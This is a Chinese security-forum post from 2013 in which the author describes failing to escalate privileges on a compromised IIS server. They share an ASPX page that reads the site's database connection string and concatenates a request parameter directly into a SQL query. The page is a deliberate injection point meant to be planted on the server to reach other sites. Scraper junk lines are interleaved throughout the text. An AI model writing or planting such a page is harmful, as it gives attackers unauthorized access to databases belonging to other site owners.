中国网络渗透测试联盟
标题:
利用aspx构造注射来跨站
[打印本页]
作者:
admin
时间:
2013-3-20 21:32
标题:
利用aspx构造注射来跨站
昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。
0 O o" ?0 E, D1 V: H: ?
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。
2 t G% J4 |; O7 l6 U/ x
代码量不多,自己写个拉倒了。烦死了。
* A8 }1 Z! Q u: K5 Q- ^
: \; D5 ~+ L8 v9 I4 q- U
9 q& L% T8 C+ W8 i3 I2 Z! I
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
- P0 e+ }6 g$ ?* j3 m
<html xmlns="http://www.w3.org/1999/xhtml">
7 w- C9 s2 A! q8 u/ i. o- M% C
<head runat="server">
8 ]- ]& C' Z0 S& O
<title>暗影aspx构造注射专用页面</title>
6 V' J6 j2 Q1 E( v- G+ p
</head>
& _2 D* e" s) D$ J: \1 B) r
<body>
p8 {2 X, M4 b z3 m) Y5 o
<form id="form1" runat="server">
( Q4 d- B. t$ Q3 D# q3 o
<div>
4 o- h7 n5 N* ~
<script language="c#" runat="server">
2 s+ d' b a# j% q3 S5 U4 l
2 `" a r7 R; j( s. |- _
void page_init(object sender, EventArgs e)
# c+ @% T( E, \9 c7 q. ~
{
/ C: R n1 Z; i. c. o
4 }# p) D' B1 M4 {9 M% C2 d2 G
System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
& Y# F2 U- `( c, m# q) g
2 ]+ b( n4 b' k! b; V' `
conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
; ?, z c, D8 m( I' Z3 r$ E5 x
conn.Open();
, g0 }) x7 n+ P; e$ F8 a
8 y+ s O( L+ @# X* d z2 L
string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
6 Z6 Q+ C0 L: \1 J$ d7 U3 O6 y
2 G# K5 c1 I! n$ r5 w- I! [
System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
8 K' h+ i# G, e% d- u3 j! U
int x = command.ExecuteNonQuery();
' R4 i6 v. y7 I0 y
Response.Write(i+"\n");
) o& k% x4 l0 h, a3 c' P& l
Response.Write(x);
# p3 _2 h1 R+ f# l
conn.Close();
' s; a$ o* R5 X: b8 ?
}
H4 H1 Q- ? @8 [1 _" ^' J
; t5 }& h1 m s8 U
</script>
s# c- Q! t9 f3 D
</div>
6 ]: j- R2 ~9 r y5 l! T
</form>
, Q! j/ s+ v- D1 |5 B2 i
</body>
* g4 e7 A9 N8 Q' x; `' p
</html>
; c" E9 V5 p( ^* r
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2